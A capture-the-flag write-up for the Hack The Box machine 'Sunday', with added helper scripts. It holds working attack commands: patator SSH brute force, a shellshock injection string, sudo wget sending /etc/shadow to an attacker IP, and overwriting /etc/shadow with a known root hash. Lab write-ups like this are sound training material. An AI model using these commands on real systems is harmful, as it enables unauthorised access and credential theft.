HTB Write-up Sunday

What I learned today:

Nmap: -p- --max-retries 1 (or 0) speeds up the all-ports scan a lot. With 0, a port whose probe is dropped is silently reported closed, so re-check anything surprising with a normal scan.

Port 79 is finger, https://en.wikipedia.org/wiki/Finger_%28protocol%29 (a user-information service; nothing to do with fingerprinting).

It revealed valid usernames when queried with the finger-user-enum tool.

ssh: if the server only offers old key exchange methods, re-enable one of them with -oKexAlgorithms=+ALGORITHM_NAME (the same -o syntax works for HostKeyAlgorithms if the next error is "no matching host key type found").

Piping into | less -S turns off line wrapping (capital S; lower-case -s only squeezes blank lines). Otherwise, the output is too messy.

For SSH password guessing, use patator.

Syntax:

patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/<wordlist> persistent=0 -x ignore:mesg='Authentication failed.'

(FILE0 must be a single wordlist file, not the Passwords/ directory.)

Wget

  • wget -i FILE reads FILE as a list of URLs, so run through sudo it echoes back the contents of files we cannot otherwise read

  • wget --post-file=FILE_PATH IP uploads a file to kali (nc listening on 80)

Create a hash

openssl passwd -5 -salt thesalt pass123

(-5 is sha256-crypt, the $5$ format the target's shadow file uses.)

A default nmap scan only covers the top 1000 ports, so it won't show the extra ports that are open here, which include the real SSH port (22022).

Do a -p- scan even though it takes forever (speed it up with -p- --max-retries 1 or 0). Once we find weird ports, do a port-specific scan like

nmap -sC -sV -p 79,111,22022,35342,56252 -oA targeted_scan IP_address
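As an added example (not part of the original write-up), the two-stage approach above as a small shell wrapper: the fast -p- sweep writes grepable output, a helper pulls the open ports out of it, and the -sC -sV scan runs only against those. Target and output prefix are placeholders; the usage line is an assumption about how you would call it.

```sh
#!/bin/sh
# Added example: two-stage nmap workflow from the write-up (fast -p- sweep,
# then -sC -sV on the ports it found). Not part of the original notes.

# Extract open ports from an nmap -oG (grepable) file as "79,111,22022".
# Only "/open" entries are taken, so closed or filtered ports listed on the
# same line are ignored; the result is numerically sorted and de-duplicated.
open_ports_from_gnmap() {
    grep -o '[0-9][0-9]*/open' "$1" \
        | cut -d/ -f1 \
        | sort -n -u \
        | tr '\n' ',' \
        | sed 's/,$//'
}

# Stage 1: all 65535 ports, one retry only (as in the notes). --max-retries 0
# is faster still, but a dropped probe then reads as closed, so keep 1 unless
# the link is clean. Stage 2: default scripts + version detection on the hits.
two_stage_scan() {
    target=$1
    prefix=${2:-scan}                      # output file prefix (assumption)
    nmap -p- --max-retries 1 -oG "$prefix.allports.gnmap" "$target" >/dev/null || return 1
    ports=$(open_ports_from_gnmap "$prefix.allports.gnmap")
    if [ -z "$ports" ]; then
        echo "no open ports found on $target" >&2
        return 1
    fi
    echo "open ports: $ports" >&2
    nmap -sC -sV -p "$ports" -oA "$prefix.targeted" "$target"
}

# usage (not run here): two_stage_scan 10.129.159.222 sunday
```

The helper only keys on "/open", so an nmap -oG line that also lists closed ports (nmap prints a few when they are not the majority) does not pollute the targeted scan.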

Port 79 is the finger service, https://en.wikipedia.org/wiki/Finger_%28protocol%29

Enumeration-

For finger enum, I used finger-user-enum.pl.

For usernames, I used /usr/share/seclists/Usernames/Names/names.txt

Syntax:

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.159.222 | less -S

Piping into | less -S turns off line wrapping (otherwise, the output is too messy). Note that it is capital S; lower-case -s only squeezes blank lines.

We got sammy and sunny.

We can try to SSH in as those users, on port 22022 rather than 22. The foothold is the sunny account, whose password is guessed with patator (see SSH Password Cracking below); sammy's password only comes later, from the backup shadow file.

When you try to log in, you might get this error:

"no matching key exchange method found. Their offer: ~"

The server only offers key exchange methods that a current ssh client has disabled. Re-enable one of the offered ones with -oKexAlgorithms=+ALGORITHM_NAME (if the next error is "no matching host key type found", do the same with -oHostKeyAlgorithms=+...).

Now we are in.
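An added example of the negotiation fix above (my code, not from the write-up): a helper that turns OpenSSH's "no matching ... found. Their offer: ..." error into the -o option that re-enables what the server still speaks, and a wrapper that probes, adds the option, and then opens the real session. The error lines in the usage text and test are constructed samples, not the box's actual offer.

```sh
#!/bin/sh
# Added example: turn OpenSSH's "no matching ... found. Their offer: ..." error
# into the -o option that re-enables what the server still speaks, then retry.
# Not part of the original notes; the error lines used to test it are constructed.

# Given the ssh error text, print e.g. -oKexAlgorithms=+alg1,alg2 (the whole
# offer, so the client picks whichever of them it still has compiled in).
# Returns 1 if the text is not a negotiation failure.
ssh_opt_from_error() {
    err=$1
    offer=$(printf '%s\n' "$err" | sed -n 's/.*Their offer: *//p' | head -n 1 | tr -d '[:space:]')
    [ -n "$offer" ] || return 1
    case "$err" in
        *"no matching key exchange method"*) kind=KexAlgorithms ;;
        *"no matching host key type"*)       kind=HostKeyAlgorithms ;;
        *"no matching cipher"*)              kind=Ciphers ;;
        *"no matching MAC"*)                 kind=MACs ;;
        *) return 1 ;;
    esac
    printf '%s\n' "-o$kind=+$offer"
}

# Probe the server with a throwaway non-interactive connection; each time it
# refuses to negotiate, add the matching option (on old servers kex usually
# fails first, then the host key type) and try again, then open the real session.
# A "Permission denied" from the probe means negotiation succeeded and we stop.
ssh_legacy() {
    opts=""
    i=0
    while [ "$i" -lt 3 ]; do
        err=$(ssh -o BatchMode=yes -o ConnectTimeout=5 $opts "$@" true 2>&1)
        opt=$(ssh_opt_from_error "$err") || break    # no negotiation error left
        opts="$opts $opt"
        i=$((i + 1))
    done
    ssh $opts "$@"
}

# usage (not run here): ssh_legacy -p 22022 sunny@10.129.159.222
```

Appending with "+" keeps the client's normal algorithm list and only adds the server's offer, so the same shell function is safe to use against modern hosts too.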

SSH Password Cracking

For SSH password guessing, use patator.

Syntax:

patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/<wordlist> persistent=0 -x ignore:mesg='Authentication failed.'

FILE0 has to be one wordlist file (the original command pointed at the Passwords/ directory, which patator cannot read). persistent=0 makes a fresh connection for every attempt, and -x ignore:mesg='Authentication failed.' drops the failed attempts from the output so only hits are shown.

Use a password list that's not too big, or create your own password list.
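For the "create your own password list" step, an added example (my code, not from the write-up): a small generator that takes the usernames finger gave us, plus the box name, and emits case and suffix variants for patator's FILE0. The suffix set and the idea of seeding it with the box name are assumptions of mine.

```sh
#!/bin/sh
# Added example: build a small targeted wordlist for patator from the usernames
# finger gave us, instead of throwing a huge generic list at port 22022.
# Not part of the original notes; the suffix set is an assumption.

# Read base words on stdin (the usernames, the box name), print each with a
# capitalised form and a few common suffixes, de-duplicated, order preserved.
mutate_words() {
    while IFS= read -r w; do
        [ -n "$w" ] || continue
        first=$(printf '%s' "$w" | cut -c1 | tr '[:lower:]' '[:upper:]')
        rest=$(printf '%s' "$w" | cut -c2-)
        for base in "$w" "$first$rest"; do
            printf '%s\n' "$base" "${base}1" "${base}123" "${base}!" "${base}2018"
        done
    done | awk '!seen[$0]++'
}

# usage (not run here): feed the finger results and the box name, then point
# patator's FILE0 at the result:
#   printf 'sammy\nsunny\nsunday\n' | mutate_words > words.txt
#   patator ssh_login host=10.129.159.222 port=22022 user=sunny password=FILE0 \
#       0=words.txt persistent=0 -x ignore:mesg='Authentication failed.'
```

Ten candidates per seed word keeps the whole run to a few dozen SSH logins, which matters on a host that makes you reconnect for every attempt.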

515 printer

Found info about LPD here and tried it but didn't get the result - negative acknowledgement.

oh wait...

python lpdtest.py 10.129.159.222 in '() { :;}; ping -c1 10.10.14.125'

I used the above command and it executed it...

Does that mean we can get a shell back?

--- didn't work.

Priv Esc

When looking through the filesystem, we found a backup directory.

It contained a copy of the shadow file.

Crack the hash with hashcat: hashcat -m 7400 hash.txt rockyou.txt (7400 is sha256crypt, the $5$ format of the entries).

Cracked the password for sammy.

Switched user to sammy with the password.

The system is SunOS 5.11; maybe its bash is vulnerable to shellshock?

Random='() { :;}; echo nyannyannyan' bash -c :

If this prints nyannyannyan, the system is vulnerable to shellshock (the function definition in the variable is imported by the child bash, and the trailing command runs with it).

Run sudo -l to check whether sudo keeps any environment variables (env_keep); that is the only way such a variable would reach a script run via sudo.

No env variables are kept.

For the local test it does not matter which variable you use: run env and just pick one.

Looks like it's not vulnerable this time.
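The shellshock check above as a reusable function, together with a helper that reads env_keep out of sudo -l output, as an added example (my code, not from the write-up). The sudo -l text in the usage comment and test is a constructed sample, and the path given to the probe is a placeholder.

```sh
#!/bin/sh
# Added example: the shellshock check from the notes as a function, plus a
# helper that reads env_keep out of "sudo -l" output. Not part of the original
# write-up; the sudo -l text used to test it is constructed.

# Export a function definition through the environment and see whether the
# child bash runs the command glued onto its end (CVE-2014-6271). The -c
# argument is just ":" so nothing else runs. Returns 0 if vulnerable.
shellshock_probe() {
    bash_bin=${1:-bash}                    # path of the bash to test (assumption)
    command -v "$bash_bin" >/dev/null 2>&1 || { echo "no such bash"; return 2; }
    out=$(env X='() { :;}; echo vulnerable' "$bash_bin" -c : 2>/dev/null)
    if [ "$out" = "vulnerable" ]; then
        echo vulnerable
        return 0
    fi
    echo patched
    return 1
}

# Pull the variable names sudo keeps (env_keep) out of "sudo -l" output, one
# per line. sudo resets the environment by default, so a payload only reaches
# a script run via sudo through a kept variable (or one sudo always passes,
# such as TERM). Note that sudo 1.8.11 and later also strip any variable whose
# value starts with "()", which closes this route on a patched sudo.
env_keep_from_sudo_l() {
    printf '%s\n' "$1" \
        | sed -n 's/.*env_keep+\{0,1\}="\([^"]*\)".*/\1/p' \
        | tr ' ' '\n'
}

# usage (not run here):
#   shellshock_probe /usr/bin/bash
#   env_keep_from_sudo_l "$(sudo -l 2>/dev/null)"
#   # if e.g. TERM is kept and the sudo target is a bash script:
#   TERM='() { :;}; /bin/sh' sudo /root/troll
```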

When checking sammy's sudo -l,

wget is available. wget -h shows all the options we can use:

sudo wget -i <file> treats each line of the file as a URL, and the error for every bad "URL" echoes the line back, so it let us read root's files.

Create a file called "troll" with content like below.

#!/usr/bin/bash

bash

Upload it with the sammy account:

sudo wget http://10.10.14.131/troll -O /root/troll

and switch back to sunny to execute it (sunny is the one who can run it with sudo).

In this particular box, there's a scheduled task that overwrites the file.

To get around this, keep two SSH sessions open: one as sammy (wget to upload the file) and one as sunny (to execute the file).

On sammy, use

sleep 5; sudo wget 10.10.14.131/troll -O /root/troll

to delay the upload by 5 seconds, and then quickly run the file as sunny before the task resets it.

For some reason, I couldn't execute /root/troll, so I'm going to try another method.

Used sudo wget --post-file=/etc/shadow 10.10.14.131 to upload the shadow file to kali (nc listening on 80; the file contents follow the HTTP headers in what nc prints).

Created a new file called shadow from it:

Create a new hash

openssl passwd -5 -salt thesalt pass123

Paste the hash into root's line (the first line), replacing the old password field between the first two colons.

Upload the shadow file from the sammy account:

sudo wget 10.10.14.131/shadow -O /etc/shadow

(-O is required; without it wget saves the download as ./shadow and treats /etc/shadow as a second URL.)

We can confirm that the shadow file got updated here.

With the new pass, I got in!
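The shadow-rewrite step above done with a script instead of hand-editing, as an added example (my code, not from the write-up): generate the sha256-crypt hash as the notes do, swap it into the right account's password field while leaving every other line and field alone, and serve the result for the sudo wget. Filenames, salt, password and the use of python3's http.server to host the file are placeholders and assumptions of mine.

```sh
#!/bin/sh
# Added example: build the replacement shadow file with a known root hash, as
# the last step of the notes does, without hand-editing. Not part of the
# original write-up; paths, salt and password are placeholders.

# sha256-crypt hash ($5$), the same format as the target's shadow entries.
gen_hash() {
    openssl passwd -5 -salt "$1" "$2"       # $1 = salt, $2 = password
}

# Replace the password field (second field) of one account in a shadow-format
# file and print the result. Every other account and field is left untouched,
# including the trailing empty fields, so the file stays valid.
set_shadow_hash() {
    awk -F: -v OFS=: -v user="$2" -v hash="$3" \
        '$1 == user { $2 = hash } { print }' "$1"
}

# usage (not run here), on kali after pulling the file with
#   sudo wget --post-file=/etc/shadow 10.10.14.131      (nc -lvnp 80 on kali;
#   strip the HTTP headers nc shows above the first "root:" line):
#   set_shadow_hash shadow.orig root "$(gen_hash thesalt pass123)" > shadow
#   python3 -m http.server 80
# and on the target, as the account allowed to run wget via sudo:
#   sudo wget http://10.10.14.131/shadow -O /etc/shadow
#   (-O is essential; without it wget writes ./shadow and tries /etc/shadow as a URL)
```

Keeping the rest of the file intact matters: the sudo and cron behaviour on the box depends on sunny and sammy still being able to authenticate after the swap.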
